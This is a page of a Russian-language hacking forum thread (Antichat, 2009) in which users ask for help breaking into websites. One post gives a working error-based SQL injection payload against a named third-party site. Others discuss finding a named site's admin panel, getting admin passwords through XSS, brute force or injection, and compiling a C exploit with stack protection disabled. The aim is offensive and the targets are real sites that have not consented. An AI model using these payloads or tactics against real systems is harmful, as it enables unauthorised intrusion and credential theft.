Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 501 of 1207
  1. vorona

    vorona Member

    Joined:
    7 Sep 2009
    Messages:
    392
    Likes Received:
    7
    Reputations:
    1
    strip_tags поможет в случае с выводом в ссылку или с утф-7??
     
    #10001 vorona, 12 Nov 2009
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров
     
    #10002 Pashkela, 12 Nov 2009
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Он хочет например через str_replace() заменять в передаваемых гетом/постом запросах латинские буквы на русские, чтобы если ты передаешь гетом или постом что то типа "...script" оно менялось на русские буквы и не пахало.
    Это не самый лутший вариант.

    Но хочу повторить: здесь раздел для обсуждения УЯЗВИМОСТЕЙ, по поводу защиты пиши в кодинг.
     
    #10003 Ins3t, 12 Nov 2009
    Last edited: 12 Nov 2009
  4. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Посмотрите еще вот это плиз


    www.bulletinpa.com/index.php?id=700%27
    вот такая ошибка
    Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

    www.bulletinpa.com/index.php?id=700 and 1=0
    резульатат тот же что и:
    www.bulletinpa.com/index.php?id=700

    почему так происходит?
     
    #10004 fng, 12 Nov 2009
  5. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163

    Code:
    http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
    версия видна ('5.0.32-Debian_7etch1-log')
    2. МБ фильтрация (Т.К вроде идет Blind sql)
     
    #10005 [x60]unu, 12 Nov 2009
    Last edited: 12 Nov 2009
    2 people like this.
  6. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    гуд,вот только /**/and/**/1=1/* - тут незачем
    ПС слепая там
     
    #10006 L I G A, 12 Nov 2009
  7. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Да /**/and/**/1=1/* разве что для обхода фильтрации, но мне так удобнее выходит ;)
     
    #10007 [x60]unu, 12 Nov 2009
    1 person likes this.
  8. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите найти админку, сканером не получается.


    http://www.lechaim.co.za
     
    #10008 FlaktW, 12 Nov 2009
  9. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    люди, вот за сегодня сайтов 5 раскрутил до вида логин;пасс и нашел админки. Но ни одна пара логина и пароля не подошла и с такой проблемой я сталкиваюсь ооочень часто.
    П.С. Пары,уверен, с админскими правами
     
    #10009 jecka3000, 12 Nov 2009
  10. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    ну как бэ я думаю, что у обычного юзера логин admin не будет)
     
    #10010 jecka3000, 12 Nov 2009
  11. Kadness

    Kadness New Member

    Joined:
    12 Nov 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Чото не получается с XSS видно защита какаято или хз((( Есть еще варианты получить пасс админа??(кроме брута)
     
    #10011 Kadness, 12 Nov 2009
    Last edited: 12 Nov 2009
  12. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    php injection (шелл) sql injection (пассы юзеров, может быть что и админа) брут сайтов + приват прокси + хороший пасс лист ( и мон кучу юзеров сбрутить)
     
    #10012 [x60]unu, 13 Nov 2009
  13. Kadness

    Kadness New Member

    Joined:
    12 Nov 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Из всего этого я знаю только брут)))
     
    #10013 Kadness, 13 Nov 2009
  14. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    php injection - http://forum.antichat.ru/thread12123.html
    sql injection - http://forum.antichat.ru/thread43966.html
    неужели трудно было самому найти
     
    #10014 [x60]unu, 13 Nov 2009
    1 person likes this.
  15. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    [x60]unu, выручай

    никак не могу разобрать твой хитрый запрос....
    почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

    сижу вот голову ломаю, никак не разобрался =(
     
    #10015 fng, 13 Nov 2009
  16. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Вот ответ на твой вопрос:
    http://forum.antichat.ru/threadnav119047-2-10.html
     
    #10016 Iceangel_, 13 Nov 2009
    2 people like this.
  17. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    NAME_CONST - http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_name-const
     
    #10017 [x60]unu, 13 Nov 2009
    1 person likes this.
  18. totem

    totem New Member

    Joined:
    25 Jan 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -5
    как скомпилить сплойт, написанный на Си компилятором g++ ?

     
    #10018 totem, 13 Nov 2009
  19. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    2totem

    Code:
    $ [b]gcc[/b] -fno-stack-protector -o exp exploit.c
     
    #10019 razb, 13 Nov 2009
  20. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный:
    как в данном случае можно подставить запрос?
     
    #10020 M1ks, 13 Nov 2009
(You must log in or sign up to post here.)
Page 501 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.